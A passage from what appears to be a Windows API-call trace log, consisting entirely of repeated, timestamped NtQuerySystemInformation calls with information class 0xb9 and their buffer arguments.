SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda60, Length=0x38, ResultLength=0x0) [0192.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda60, Length=0x38, ResultLength=0x0) [0192.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb40, Length=0x40, ResultLength=0x0) [0192.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb40, Length=0x40, ResultLength=0x0) [0192.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda60, Length=0x38, ResultLength=0x0) [0192.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda60, Length=0x38, ResultLength=0x0) [0192.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda60, Length=0x38, ResultLength=0x0) [0192.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda60, Length=0x38, ResultLength=0x0) [0192.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda60, Length=0x38, ResultLength=0x0) [0192.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda60, Length=0x38, ResultLength=0x0) [0192.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda60, Length=0x38, ResultLength=0x0) [0192.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda60, Length=0x38, ResultLength=0x0) [0192.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda60, Length=0x38, ResultLength=0x0) [0192.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.592] NtQuerySystemInformation (SystemInformationClass=0xb9, 